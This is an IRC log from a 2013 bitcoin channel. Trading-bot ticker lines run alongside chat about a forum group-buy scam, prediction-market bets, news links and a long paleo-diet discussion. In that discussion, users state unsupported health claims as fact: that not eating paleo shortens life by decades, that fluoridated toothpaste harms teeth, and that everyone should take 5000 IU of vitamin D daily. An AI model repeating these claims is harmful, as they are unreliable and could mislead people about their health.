the address too Jul 27 17:09:34 ic Jul 27 17:09:45 these are basically consulting. Jul 27 17:10:27 ah Jul 27 17:11:42 [BTCTC] [BASIC-MINING] 1 @ 0.527 BTC [-] Jul 27 17:12:37 [BTCTC] [ACTIVEMINING] 20 @ 0.005682 = 0.1136 BTC [-] Jul 27 17:13:11 [BTCTC] [ACTIVEMINING] 25 @ 0.005575 = 0.1394 BTC [-] Jul 27 17:13:12 [BTCTC] [ACTIVEMINING] 1 @ 0.005575 BTC [-] Jul 27 17:13:14 [BTCTC] [ACTIVEMINING] 4 @ 0.005574 = 0.0223 BTC [-] Jul 27 17:14:32 https://bitcointalk.org/index.php?topic=262566.0;all Jul 27 17:14:40 vdragon Erupter-Groupbuy-Scam : Task Force Jul 27 17:14:47 tl;dr : bunch of forum noobs gave hundreds of btc to random forum noob Jul 27 17:14:49 [BTCTC] [ACTIVEMINING] 25 @ 0.005575 = 0.1394 BTC [+] Jul 27 17:14:57 now they wish for "someone to do something" Jul 27 17:15:09 and also are internet detectiving, ips and whatnot. Jul 27 17:15:35 I forgot to move some music into my music dir Jul 27 17:15:48 [BTCTC] [ACTIVEMINING] 25 @ 0.005575 = 0.1394 BTC [+] Jul 27 17:15:50 433 hours Jul 27 17:16:12 Diablo-D3: like what Jul 27 17:16:14 Diablo-D3 what difference does it make ? Jul 27 17:16:17 [BTCTC] [BTC-BOND] 30 @ 0.009998 = 0.2999 BTC [+] Jul 27 17:16:22 mircea_popescu: it doesnt Jul 27 17:16:28 I just wish I had an entire month of music Jul 27 17:16:28 a cool then :D Jul 27 17:16:36 [BTCTC] [ACTIVEMINING] 25 @ 0.005575 = 0.1394 BTC [+] Jul 27 17:16:38 dude, i don't think an entire month of music has been made. Jul 27 17:16:43 [BTCTC] [ACTIVEMINING] 5 @ 0.005678 = 0.0284 BTC [+] Jul 27 17:16:44 come back in 2750 or something Jul 27 17:16:49 mircea_popescu: lol Jul 27 17:16:53 that much music does infact exist Jul 27 17:16:58 well... "music". Jul 27 17:17:26 [BTCTC] [ACTIVEMINING] 46 @ 0.005574 = 0.2564 BTC [-] Jul 27 17:17:28 [BTCTC] [ACTIVEMINING] 1 @ 0.005574 BTC [-] Jul 27 17:17:33 some artists probably made more than a month by themselves Jul 27 17:18:10 pankkake who, zappa ? Jul 27 17:18:34 I was thinking Merzbow ;) Jul 27 17:18:37 [BTCTC] [ACTIVEMINING] 5 @ 0.005573 = 0.0279 BTC [-] Jul 27 17:18:39 [BTCTC] [ACTIVEMINING] 5 @ 0.005572 = 0.0279 BTC [-] Jul 27 17:18:41 [BTCTC] [ACTIVEMINING] 11 @ 0.005568 = 0.0612 BTC [-] Jul 27 17:18:43 [BTCTC] [ACTIVEMINING] 1 @ 0.005567 BTC [-] Jul 27 17:18:44 [BTCTC] [ACTIVEMINING] 1 @ 0.005563 BTC [-] Jul 27 17:18:45 [BTCTC] [ACTIVEMINING] 1 @ 0.005562 BTC [-] Jul 27 17:18:47 [BTCTC] [ACTIVEMINING] 1 @ 0.005561 BTC [-] Jul 27 17:18:48 [BTCTC] [ACTIVEMINING] 1 @ 0.00556 BTC [-] Jul 27 17:24:54 omg trolling me. Jul 27 17:26:45 http://bitbet.us/bet/491/the-winklevoss-bitcoin-etf-to-be-open-for/ Jul 27 17:26:48 [BTCTC] [ACTIVEMINING] 28 @ 0.005301 = 0.1484 BTC [-] Jul 27 17:26:48 awww and nobody cares. Jul 27 17:26:50 [BTCTC] [ACTIVEMINING] 100 @ 0.005301 = 0.5301 BTC [-] Jul 27 17:26:51 BitBet - The Winklevoss Bitcoin ETF to be open for public investment before December 1st 2013 Jul 27 17:26:52 [BTCTC] [ACTIVEMINING] 1 @ 0.0053 BTC [-] Jul 27 17:26:55 [BTCTC] [ACTIVEMINING] 100 @ 0.0053 = 0.53 BTC [-] Jul 27 17:26:57 [BTCTC] [ACTIVEMINING] 25 @ 0.005212 = 0.1303 BTC [-] Jul 27 17:26:58 [BTCTC] [ACTIVEMINING] 1 @ 0.005212 BTC [-] Jul 27 17:27:00 [BTCTC] [ACTIVEMINING] 200 @ 0.005211 = 1.0422 BTC [-] Jul 27 17:27:01 [BTCTC] [ACTIVEMINING] 1000 @ 0.00521 = 5.21 BTC [-] Jul 27 17:27:03 [BTCTC] [ACTIVEMINING] 1 @ 0.00521 BTC [-] Jul 27 17:27:05 [BTCTC] [ACTIVEMINING] 300 @ 0.005201 = 1.5603 BTC [-] Jul 27 17:27:07 [BTCTC] [ACTIVEMINING] 100 @ 0.0052 = 0.52 BTC [-] Jul 27 17:27:10 [BTCTC] [ACTIVEMINING] 50 @ 0.005185 = 0.2593 BTC [-] Jul 27 17:27:12 [BTCTC] [ACTIVEMINING] 25 @ 0.005181 = 0.1295 BTC [-] Jul 27 17:27:14 [BTCTC] [ACTIVEMINING] 2 @ 0.00517 = 0.0103 BTC [-] Jul 27 17:27:17 [BTCTC] [ACTIVEMINING] 1067 @ 0.00513 = 5.4737 BTC [-] Jul 27 17:27:32 [BTCTC] [ACTIVEMINING] 25 @ 0.005569 = 0.1392 BTC [+] Jul 27 17:27:58 get the twins to see that bet, could be a great publicity stunt for all parties if they make a play Jul 27 17:28:23 well... i put it on tweeter Jul 27 17:28:30 I like that one http://bitbet.us/bet/489/apple-to-close-below-300-before-november-2013/ Jul 27 17:29:43 though I think it's unlikely, it would make me happy… Jul 27 17:30:14 it does seem unlikely. Jul 27 17:30:18 Winklevoss Twins Bet $100,000 on Bitcoin WTF Approval in Bitcoin Prediction Market Jul 27 17:30:25 what with the deluge of freshly minted dollars , no us stock is going low ever again Jul 27 17:30:28 [BTCTC] [DMS.MINING] 12 @ 0.01287 = 0.1544 BTC [+] Jul 27 17:30:30 [BTCTC] [DMS.MINING] 21 @ 0.01287 = 0.2703 BTC [+] Jul 27 17:30:31 [BTCTC] [DMS.MINING] 50 @ 0.01288 = 0.644 BTC [+] Jul 27 17:30:33 [BTCTC] [DMS.MINING] 10 @ 0.0129 = 0.129 BTC [+] Jul 27 17:31:04 http://sourceforge.net/projects/bitcoin/files/Bitcoin/stats/timeline?dates=2013-01-01+to+2013-07-27 Jul 27 17:31:07 hrm Jul 27 17:31:23 well, I see AAPL going down, and all the stock market going down, eventually - if both happen at the same time maybe. but it seems too soon Jul 27 17:32:20 [BTCTC] [DMS.MINING] 35 @ 0.01299 = 0.4547 BTC [+] Jul 27 17:32:58 Scrat does explain why the marauding forum noob army seems to be born in may. Jul 27 17:33:51 i was born in december. makes me an oldfag Jul 27 17:33:58 they bought all the cheap bitcoins and now they wanna play Jul 27 17:33:59 [BTCTC] [COGNITIVE] 1 @ 0.631 BTC [-] Jul 27 17:34:01 [BTCTC] [COGNITIVE] 1 @ 0.631 BTC [-] Jul 27 17:34:03 [BTCTC] [COGNITIVE] 10 @ 0.63 = 6.3 BTC [-] Jul 27 17:34:04 i'd never expect downloads to reach january levels though Jul 27 17:34:22 be careful reading too much into that stats methinks Jul 27 17:34:33 ^ Jul 27 17:34:34 I never downloaded bitcoin from sourceforge Jul 27 17:34:50 who the fuck downloads it anymore Jul 27 17:35:24 even if you factor in the popularity of blockchain.info Jul 27 17:35:44 (which is mainly used by noobs to hold their 0.0001 btc) Jul 27 17:35:53 Scrat you'd be surprised. Jul 27 17:36:35 [BTCTC] [CRYPTO-TRADE] 8 @ 0.1999 = 1.5992 BTC [+] Jul 27 17:36:42 [BTCTC] [CRYPTO-TRADE] 31 @ 0.2 = 6.2 BTC [+] Jul 27 17:37:15 here's the major blockchain usecase : person makes deal for in person exchange. shows up with blockchain wallet loaded to the sum. he's just made this, and it will get discarded after deal. Jul 27 17:38:29 yeah, I've probably made 30 throwaway wallets myself Jul 27 17:40:47 yea. so because of this, you see 100s, even ks there. Jul 27 17:41:26 and now there's inputs.io which, I don't understand why, seems popular Jul 27 17:41:42 pankkake because tf spends a lot of time chatting up noobs. Jul 27 17:42:08 with dubious "security" claims Jul 27 17:42:30 he is kind of hit and miss Jul 27 17:42:35 but he does ocasionally hit pretty well. Jul 27 17:43:15 self taught kid. you should have seen the sort of code he was penning a year ago. Jul 27 17:47:29 ;;calc 18.75 / 12 Jul 27 17:47:29 1.5625 Jul 27 17:48:34 thestringpuller!*@* added to ignore list. Jul 27 17:48:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.04543 BTC [+] Jul 27 17:51:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005534 = 0.1384 BTC [-] Jul 27 17:52:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005532 = 0.1383 BTC [-] Jul 27 17:52:54 [BTCTC] [ACTIVEMINING] 40 @ 0.005533 = 0.2213 BTC [+] Jul 27 17:53:02 [BTCTC] [TAT.ASICMINER] 17 @ 0.04473 = 0.7604 BTC [-] Jul 27 17:53:35 [BTCTC] [ACTIVEMINING] 1 @ 0.005532 BTC [-] Jul 27 17:58:42 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.0034 = 0.0408 BTC [+] Jul 27 17:59:55 [BTCTC] [ACTIVEMINING] 5 @ 0.005499 = 0.0275 BTC [-] Jul 27 18:00:26 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0034 = 0.068 BTC [+] Jul 27 18:03:16 [BTCTC] [ACTIVEMINING] 7 @ 0.005399 = 0.0378 BTC [-] Jul 27 18:06:15 [BTCTC] [COGNITIVE] 3 @ 0.66 = 1.98 BTC [+] Jul 27 18:08:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.04542 BTC [+] Jul 27 18:14:41 [BTCTC] [ACTIVEMINING] 7 @ 0.005399 = 0.0378 BTC [-] Jul 27 18:17:07 [BTCTC] [DMS.MINING] 10 @ 0.01244 = 0.1244 BTC [-] Jul 27 18:19:58 [BTCTC] [BASIC-MINING] 7 @ 0.53 = 3.71 BTC [+] Jul 27 18:20:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.04525 BTC [-] Jul 27 18:21:33 [BTCTC] [ACTIVEMINING] 22 @ 0.005397 = 0.1187 BTC [-] Jul 27 18:25:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.04524 = 0.1357 BTC [-] Jul 27 18:25:35 [HAVELOCK] [SMG] 8 @ 0.00027 = 0.0022 BTC [+] Jul 27 18:25:59 [BTCTC] [ACTIVEMINING] 2 @ 0.005397 = 0.0108 BTC [-] Jul 27 18:26:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0447 BTC [-] Jul 27 18:26:28 [BTCTC] [BASIC-MINING] 10 @ 0.529 = 5.29 BTC [-] Jul 27 18:27:00 [BTCTC] [LTC-ATF.B2] 1 @ 0.01015 BTC [-] Jul 27 18:28:13 [BTCTC] [ACTIVEMINING] 1 @ 0.005397 BTC [-] Jul 27 18:28:15 http://message.snopes.com/showthread.php?s=13a6539af60f5b5828536b56c3a0b5d6&p=1755428#post1755428 Jul 27 18:28:17 Live music must be permitted by Homeland Security - snopes.com Jul 27 18:29:25 [HAVELOCK] [AM100] 4 @ 0.04339885 = 0.1736 BTC [+] Jul 27 18:29:36 [HAVELOCK] [AM100] 2 @ 0.04339885 = 0.0868 BTC [+] Jul 27 18:32:25 [BTCTC] [ASICMINER-PT] 5 @ 4.644 = 23.22 BTC [+] Jul 27 18:33:37 [BTCTC] [ACTIVEMINING] 10 @ 0.005395 = 0.054 BTC [-] Jul 27 18:33:39 [BTCTC] [ACTIVEMINING] 73 @ 0.005396 = 0.3939 BTC [+] Jul 27 18:34:40 [BTCTC] [BASIC-MINING] 4 @ 0.5398 = 2.1592 BTC [+] Jul 27 18:41:12 [HAVELOCK] [SMG] 5 @ 0.00027 = 0.0014 BTC [+] Jul 27 18:42:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.04523 BTC [+] Jul 27 18:50:40 "Help Nick Carter make his first horror film and pick up a signed copy of a Backstreet Boys CD! Nick will also personally thank you on Twitter!" Jul 27 18:51:02 some icky marketing right there Jul 27 18:54:22 [BTCTC] [ACTIVEMINING] 100 @ 0.005396 = 0.5396 BTC [+] Jul 27 18:54:48 [BTCTC] [ACTIVEMINING] 2 @ 0.005399 = 0.0108 BTC [+] Jul 27 18:55:18 o ya. Jul 27 18:56:56 [BTCTC] [BMF] 3 @ 0.04 = 0.12 BTC [+] Jul 27 18:57:06 [BTCTC] [ACTIVEMINING] 3 @ 0.005399 = 0.0162 BTC [+] Jul 27 18:57:09 The Trail of Beers http://www.wired.com/wiredscience/2013/07/craft-beer-maps/?mbid=social10178354 Jul 27 18:57:23 how could they miss a headline like that Jul 27 18:58:30 http://www.warpaths2peacepipes.com/history-of-native-americans/trail-of-tears-map.htm Jul 27 18:59:57 eq Jul 27 19:00:00 ew* Jul 27 19:00:48 [BTCTC] [BTC-BOND] 95 @ 0.009998 = 0.9498 BTC [+] Jul 27 19:01:32 lol Jul 27 19:03:49 [BTCTC] [ACTIVEMINING] 20 @ 0.005396 = 0.1079 BTC [-] Jul 27 19:06:42 [BTCTC] [FIMB] 1 @ 0.0105 BTC [+] Jul 27 19:08:13 http://www.theverge.com/culture/2013/7/26/4561176/barnaby-jack-hacker-atm-pacemaker-dies Jul 27 19:08:20 Barnaby Jack, respected hacker of ATMs and medical devices, found dead in San Francisco | The Verge Jul 27 19:08:35 "Jack had been due to speak at the 2013 Black Hat cyber security conference in Las Vegas next Thursday, August 1st. He was allegedly going to present a method of wirelessly hacking a pacemaker" Jul 27 19:09:08 [BTCTC] [DMS.MINING] 1 @ 0.01288 BTC [+] Jul 27 19:09:12 [BTCTC] [COGNITIVE] 13 @ 0.654 = 8.502 BTC [-] Jul 27 19:09:14 [BTCTC] [COGNITIVE] 8 @ 0.655 = 5.24 BTC [+] Jul 27 19:09:57 [BTCTC] [ACTIVEMINING] 50 @ 0.005399 = 0.27 BTC [+] Jul 27 19:09:59 [BTCTC] [ACTIVEMINING] 100 @ 0.0054 = 0.54 BTC [+] Jul 27 19:10:04 testing gone bad. Jul 27 19:10:26 http://imgur.com/iAzGk7D Jul 27 19:10:27 imgur: the simple image sharer Jul 27 19:11:25 [BTCTC] [B.YABMC] 10 @ 0.0028 = 0.028 BTC [-] Jul 27 19:11:35 [BTCTC] [LTC-ATF.B2] 5 @ 0.01026 = 0.0513 BTC [+] Jul 27 19:12:38 "Naked Juice Co. agreed to pay $9 million to settle the suit, which was brought by a group of consumers who alleged the juices and smoothies could not be called natural and GMO-free. Under the terms of the settlement, Naked Juice can continue to deny that they misled the public, but they are changing the labels nonetheless." Jul 27 19:12:57 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 27 19:13:21 [BTCTC] [GSDPT] 5 @ 0.00335 = 0.0168 BTC [-] Jul 27 19:13:24 Damn I didn't hear about that, not too surprised. Jul 27 19:13:57 ThickAsThieves: yeah Ive been following that Jul 27 19:14:01 the case was largely bullshit Jul 27 19:14:06 ThickAsThieves i see your fish and i give you whale : http://i.imgur.com/dIOlmHw.gif Jul 27 19:14:22 lol Jul 27 19:14:39 ThickAsThieves: basically it boils down to they use ingredients that have been known to be commercially GMO'ed, and due to the spread of GMO unchecked you can no longer call those foods non-GMO at all Jul 27 19:14:46 mircea_popescu, regarding the MPex july statement, are "Revenue from new accounts" the 30 btc registration fees ? Jul 27 19:14:59 and for the foods that are organic labeled, not all foods have organic guidelines yet, yet they were labeling them as organic Jul 27 19:15:02 Apocalyptic yes. Jul 27 19:15:08 ThickAsThieves: so basically, it was a battle of the lawyers, and the consumer loses Jul 27 19:15:14 [BTCTC] [PAJKA.BOND] 1 @ 0.04499 BTC [+] Jul 27 19:15:34 not that Im recommending Naked products, btw Jul 27 19:15:48 mircea, then how come the number is not divisible by 30 ? Jul 27 19:15:51 well they lose no matter how you swing it Jul 27 19:16:04 they're better than everything else on the shelf, but it contains unsafe ingrediants Jul 27 19:16:06 some accoutns have discounts Jul 27 19:16:14 which I forgot to do Jul 27 19:16:21 really ? how so Jul 27 19:16:27 refer Jul 27 19:16:34 Apocalyptic you can get a referral, in which case mpex only makes 20 Jul 27 19:17:13 ThickAsThieves: so yeah, I think its good that people are trying to make foods safer Jul 27 19:17:25 but the only way to do that is eradicate weeds like corn, wheat, soy, and rice Jul 27 19:17:45 Diablo-D3 here's a little story : i randomly ran into the obituary of this guy. born in kansas in 46, dead this spring. pancreatic cancer. meanwhile his wife of 35 years had ms. Jul 27 19:17:51 these are us 60 yos. Jul 27 19:17:56 paleo or die! Jul 27 19:17:59 romanian villagesd are filled with dudes aged 90 Jul 27 19:18:05 married some chick in like 1847 Jul 27 19:18:10 and she's still there feedin' the cows. Jul 27 19:18:10 ThickAsThieves: exactly. Jul 27 19:18:29 americans have the worst diets imaginable Jul 27 19:18:33 pankkake: not me Jul 27 19:18:44 yeah I know you're a paleo nazi :p Jul 27 19:18:45 I have become ubermensch. Jul 27 19:18:52 pankkake i recently found out about easy cheese. Jul 27 19:18:59 easy cheese? Jul 27 19:19:02 You are now reading what I say in bad german accent. Yeah. Jul 27 19:19:11 mircea_popescu: the spray shit in a can? Jul 27 19:19:13 [BTCTC] [BASIC-MINING] 5 @ 0.5399 = 2.6995 BTC [+] Jul 27 19:19:13 yes. comes out of a spray can Jul 27 19:19:15 lol Jul 27 19:19:17 The only weakness I have with paleo is beer, I love beer and gluten free beer is generally awful Jul 27 19:19:19 its DISGUSTING Jul 27 19:19:21 I bought a can once Jul 27 19:19:22 its HORRID Jul 27 19:19:46 rulother-gs: seeing as you need wheat/rye/barley/whatever it is for beer, you cant have actually gluten free beer Jul 27 19:19:57 I'm in France, so I doubt you could even find that kind of cheese there Jul 27 19:20:00 im not sure what paleo is. what is it ? Jul 27 19:20:07 pankkake: you're in france where they grow REAL CHEESE. so. Jul 27 19:20:20 most of europe has great cheese. Jul 27 19:20:23 [BTCTC] [BASIC-MINING] 3 @ 0.54 = 1.62 BTC [+] Jul 27 19:20:25 it's cavemen saying people should eat like cavemen, i think Jul 27 19:20:28 True Jul 27 19:20:39 maasdam is like dutch. the romanians have tons of grand cheezes too Jul 27 19:20:41 mircea_popescu: no grains (corn, wheat, rice, soy), no seed oils (canola, corn, "vegetable"), no refined sugars (hfcs, sugar), high in fruits and vegs and meats Jul 27 19:20:47 mircea_popescu: and no legumes Jul 27 19:20:54 ThickAsThieves: its not really that Jul 27 19:20:56 Are you strict paleo or do you allow some dairy or some rice? Jul 27 19:20:57 well that's not sounding too appealing. Jul 27 19:21:03 no potatoes ? no bread ? wtf. Jul 27 19:21:08 mircea_popescu: potatoes are fine Jul 27 19:21:14 but yes, no bread and no pasta Jul 27 19:21:17 potatoes are solanaceeae > legumes Jul 27 19:21:30 well fuck that, i love pasta. in white butter sauce!!! Jul 27 19:21:32 bread and pasta is pretty much the only thing I miss Jul 27 19:21:33 potatoes and tomatoes are nightshades, but still okay Jul 27 19:21:40 I didn't change my diet much otherwise Jul 27 19:21:40 and i like my girls shaved. you ubermensch you Jul 27 19:21:41 pankkake: I dont miss them to be honest Jul 27 19:21:45 just some rebalancing Jul 27 19:21:55 mircea_popescu: eh, I dont like them completely bald Jul 27 19:21:58 well, most bread people eat (especially outside of France :p) sucks Jul 27 19:21:59 [BTCTC] [DMS.SELLING] 255 @ 0.02098 = 5.3499 BTC [+] Jul 27 19:22:00 mircea_popescu: trimmed nicely is fine Jul 27 19:22:06 pankkake: yes thats the problem Jul 27 19:22:10 pankkake aactually italy has better bread than you ppl! Jul 27 19:22:13 pankkake: like, homemade bread and pasta is yummy Jul 27 19:22:25 mircea_popescu: could be Jul 27 19:22:35 I eat bread at restaurants Jul 27 19:22:35 pankkake: if I want that commercially I'd have to live in nyc and go to the corner jewish deli (every corner in nyc has one) Jul 27 19:22:46 Diablo-D3 totally. my girls must know how to make bread as a condition. Jul 27 19:23:06 as long as they can handle my big baguette Jul 27 19:23:07 but yeah, pretty much, not eating paleo means you'll die 20 years earlier than you should have Jul 27 19:23:11 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0034 = 0.068 BTC [+] Jul 27 19:23:29 maybe even 30 depending on genetics Jul 27 19:24:08 like, if cancer, diabetes, heart attacks, or strokes run in your family, paleo is the only way to live past 60. Jul 27 19:24:32 [BTCTC] [ACTIVEMINING] 25 @ 0.005493 = 0.1373 BTC [+] Jul 27 19:24:41 according to my genetics, I'm headed for cancer. the same one has taken two members of my family already Jul 27 19:24:49 if my teeth don't kill me before that Jul 27 19:24:50 :| Jul 27 19:24:54 pankkake: then I suggest paleo and maybe you'll have a chance Jul 27 19:24:54 [BTCTC] [COGNITIVE] 4 @ 0.63 = 2.52 BTC [-] Jul 27 19:24:59 pankkake: paleo improves teeth too Jul 27 19:25:06 refined sugars _destroy_ enamel Jul 27 19:25:08 maybe, but it's too late Jul 27 19:25:18 I never ate much sugars Jul 27 19:25:34 (too late for the teeth. 1 year of continuous issues without end) Jul 27 19:25:39 and flouridated toothpaste may actually be hurting teeth instead of strengthening them Jul 27 19:25:39 [BTCTC] [S.MPOE-PT] 5 @ 0.000945 = 0.0047 BTC [+] Jul 27 19:25:58 I was doing everything wrong Jul 27 19:26:06 Diablo-D3 i've been not touching flouridated anything since a decade ago Jul 27 19:26:19 mircea_popescu: yeah, Ive been thinking about just making my own toothpaste Jul 27 19:26:19 shit's horrible. Jul 27 19:26:36 well here you can buy non-F toothpaste. i guess not so easy in the us Jul 27 19:26:39 calcium, baking soda, olive oil, and peppermint extract, give or take Jul 27 19:26:51 mircea_popescu: you can here but you have to look around Jul 27 19:27:18 [BTCTC] [DMS.SELLING] 45 @ 0.02098 = 0.9441 BTC [+] Jul 27 19:27:20 [BTCTC] [DMS.SELLING] 175 @ 0.02099 = 3.6733 BTC [+] Jul 27 19:27:22 mircea_popescu: the problem is, most of them dont have added calcium Jul 27 19:27:25 my dentist made me use http://www.amazon.com/Parodontax-Herbal-Toothpaste-toothpaste-Health/dp/B0006MVREU Jul 27 19:27:32 [BTCTC] [CRYPTO-TRADE] 38 @ 0.2 = 7.6 BTC [+] Jul 27 19:27:50 at least my gum is much better now Jul 27 19:28:12 I was bleeding every time Jul 27 19:28:18 [BTCTC] [DMS.SELLING] 9 @ 0.02099 = 0.1889 BTC [+] Jul 27 19:28:18 pankkake: yeah, thats bad Jul 27 19:28:19 [BTCTC] [DMS.SELLING] 3 @ 0.02099 = 0.063 BTC [+] Jul 27 19:28:21 [BTCTC] [DMS.SELLING] 158 @ 0.021 = 3.318 BTC [+] Jul 27 19:28:24 pankkake: usually the sign of a shitty diet Jul 27 19:28:52 or brushing too hard in some people Jul 27 19:28:55 shitty way of cleaning mostly - I had loads of dental plaque Jul 27 19:28:59 like here in america we sell soft, medium, and hard bristles Jul 27 19:29:08 it was black little rocks under my gum Jul 27 19:29:15 [BTCTC] [DMS.SELLING] 5 @ 0.021 = 0.105 BTC [+] Jul 27 19:29:19 you should ONLY ever buy soft ones Jul 27 19:29:27 and all the expensive electric toothbrushes come in soft only Jul 27 19:29:29 yeah, I changed that too Jul 27 19:29:33 [BTCTC] [ACTIVEMINING] 51 @ 0.005493 = 0.2801 BTC [+] Jul 27 19:29:35 [BTCTC] [ACTIVEMINING] 102 @ 0.005496 = 0.5606 BTC [+] Jul 27 19:29:37 [BTCTC] [ACTIVEMINING] 47 @ 0.005499 = 0.2585 BTC [+] Jul 27 19:29:45 again, too late :( Jul 27 19:30:01 If only I listened to what dentists told me Jul 27 19:30:14 like, I actually recommend this: http://www.amazon.com/Professional-Precision-1000-Rechargeable-Toothbrush/ Jul 27 19:30:14 instead I said fuck it and didn't go to a dentist for years Jul 27 19:30:49 [BTCTC] [ACTIVEMINING] 26 @ 0.005499 = 0.143 BTC [+] Jul 27 19:31:02 anyway, the amount of sugar people eat is horrible Jul 27 19:31:08 true Jul 27 19:31:14 sometimes I look up drink labels Jul 27 19:31:20 it's like only sugar Jul 27 19:31:36 pankkake: I recommend cutting it all out Jul 27 19:31:41 that's why i stopped drinking these shitty drinks Jul 27 19:31:45 never drank them actually Jul 27 19:31:47 I used to drink pepsi every day Jul 27 19:31:51 like, a case of it every other day Jul 27 19:31:53 I'm not much of a sugar adept Jul 27 19:31:59 Diablo-D3, damn Jul 27 19:32:06 the worst its done to my teeth is stain them Jul 27 19:32:06 coffee without sugar Jul 27 19:32:15 and the stain is slowly being lifted off Jul 27 19:32:18 90%+ chocolate etc. Jul 27 19:32:20 [BTCTC] [ACTIVEMINING] 5 @ 0.005499 = 0.0275 BTC [+] Jul 27 19:32:34 pankkake: I do not drink coffee or eat chocolate, although some paleo do Jul 27 19:32:53 http://www.wimp.com/turbotractor/ Jul 27 19:32:56 Swedish farmer puts a turbo engine into his tractor... [VIDEO] Jul 27 19:33:10 Diablo-D3, are vegetables allowed in paleo diet ? Jul 27 19:33:19 Apocalyptic: they are a cornerstone of it Jul 27 19:33:21 [BTCTC] [BASIC-MINING] 1 @ 0.5398 BTC [-] Jul 27 19:33:23 well coffee is bad for teeth. my dentist recognized me as a coffee drinker right after I opened my mouth Jul 27 19:33:51 pankkake: yeah it stains it Jul 27 19:33:59 I recommend giving it up anyhow Jul 27 19:33:59 at least I discovered many new things to eat Jul 27 19:34:01 caffiene doesnt work Jul 27 19:34:16 I am/was addicted Jul 27 19:34:23 I never was Jul 27 19:34:32 like, people are like HOW DID YOU GO COLD TURKEY THAT IS IMPOSSIBLE Jul 27 19:34:37 I'm an easy addict Jul 27 19:34:41 its because I drank it for so long I became immune to it Jul 27 19:34:47 [BTCTC] [ACTIVEMINING] 25 @ 0.005402 = 0.1351 BTC [-] Jul 27 19:34:49 [BTCTC] [ACTIVEMINING] 13 @ 0.005401 = 0.0702 BTC [-] Jul 27 19:34:50 I got addicted to water Jul 27 19:34:51 [BTCTC] [ACTIVEMINING] 25 @ 0.005399 = 0.135 BTC [-] Jul 27 19:34:52 [BTCTC] [ACTIVEMINING] 937 @ 0.005396 = 5.0561 BTC [-] Jul 27 19:35:39 I got addicted to water // that's a nice addiction to have Jul 27 19:35:50 Stardust: not when it's 10 liters per day Jul 27 19:36:22 thats not even an addiciton though Jul 27 19:36:23 well I always liked to drink water, where most people don't really enjoy it Jul 27 19:36:32 not to _water_ though Jul 27 19:36:33 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jul 27 19:36:33 trust me, it really was :) Jul 27 19:36:43 well it was more of a habit Jul 27 19:36:45 theres an addicition to being healthy Jul 27 19:36:55 whats 10 liters in gallons? Jul 27 19:36:56 [HAVELOCK] [SMG] 10 @ 0.00026 = 0.0026 BTC [-] Jul 27 19:36:59 [HAVELOCK] [SMG] 80 @ 0.00026 = 0.0208 BTC [-] Jul 27 19:37:01 [HAVELOCK] [SMG] 62 @ 0.000259 = 0.0161 BTC [-] Jul 27 19:37:03 [HAVELOCK] [SMG] 3 @ 0.0002567 = 0.0008 BTC [-] Jul 27 19:37:05 [HAVELOCK] [SMG] 100 @ 0.000256 = 0.0256 BTC [-] Jul 27 19:37:07 [HAVELOCK] [SMG] 300 @ 0.000256 = 0.0768 BTC [-] Jul 27 19:37:07 about 2.6 right? Jul 27 19:37:09 [HAVELOCK] [SMG] 445 @ 0.0002555 = 0.1137 BTC [-] Jul 27 19:37:15 no idea but drinking more than 5 isn't recommended Jul 27 19:37:16 [BTCTC] [S.MPOE-PT] 217 @ 0.000945 = 0.2051 BTC [+] Jul 27 19:37:29 I couldn't go for an hour without drinking Jul 27 19:37:36 pankkake: yeah see Jul 27 19:37:41 I drink 64 ounces of water a day at least Jul 27 19:37:45 which is half a gallon Jul 27 19:38:08 so almost 2 liters Jul 27 19:38:31 (why 64? I own color matched 32 ounce bottles to keep track of water intake) Jul 27 19:38:50 portal colored :D Jul 27 19:38:56 one blue one orange Jul 27 19:38:57 well 2 liters is fine Jul 27 19:39:20 [BTCTC] [COGNITIVE] 1 @ 0.63 BTC [-] Jul 27 19:39:24 what I drink is pretty much the minimum most people should drink Jul 27 19:39:28 i'm kinda doomed i think Jul 27 19:39:30 I did a 24h pee exam and the bottle they gave me, which was huge, wasn't enough Jul 27 19:39:40 pankkake: yeah, they're never big enough Jul 27 19:39:47 when i was young my parents fed me exclusively on oversugared shit Jul 27 19:39:53 I think it started the time I had a pee infection - I said NEVER AGAIN and always drinked more and more Jul 27 19:39:55 Stardust: its never too late Jul 27 19:40:06 Stardust: the harder you paleo, the longer you'll live Jul 27 19:40:13 lol Jul 27 19:40:17 drank like only pepsi/fanta, shit was hard Jul 27 19:40:23 Stardust: seriously, do it. Jul 27 19:40:33 i've begun Jul 27 19:40:38 but i fear it's too late Jul 27 19:40:39 being young you can certainly handle more shit Jul 27 19:40:46 [BTCTC] [ACTIVEMINING] 25 @ 0.005493 = 0.1373 BTC [+] Jul 27 19:40:47 [BTCTC] [ACTIVEMINING] 37 @ 0.005494 = 0.2033 BTC [+] Jul 27 19:41:06 Stardust: in a few months I will be 30. Jul 27 19:41:16 hell, 3 months Jul 27 19:41:20 i'm more like 21, but still Jul 27 19:41:20 Im almost an old man :< Jul 27 19:41:25 I ate badly my entire life Jul 27 19:41:33 Ive been doing paleo for less than a year Jul 27 19:41:43 Ive gone from 340 to 248 and havent stopped losing weight Jul 27 19:42:09 wait that's 112 kg? Jul 27 19:42:29 silly americans! Jul 27 19:42:43 154 to 112 Jul 27 19:42:52 silly the rest of the world Jul 27 19:42:55 I can't even beging to imagine 154 ;) Jul 27 19:43:00 my weight is not a prob, but i often feel tired Jul 27 19:43:03 same here pankkake Jul 27 19:43:09 Apocalyptic: paleo would fix that Jul 27 19:43:14 though I had an overweight friend for whom paleo did wonders Jul 27 19:43:18 Apocalyptic: plus, start taking 5000 IU of vitamin D every day Jul 27 19:43:22 i'm 80kg for 1m95, a decent weight i believe Jul 27 19:43:30 Apocalyptic: and go to bed soon as the sun goes down and sleep until you wake up, NO ALARMS Jul 27 19:43:31 paleo certainly fixed tiredness Jul 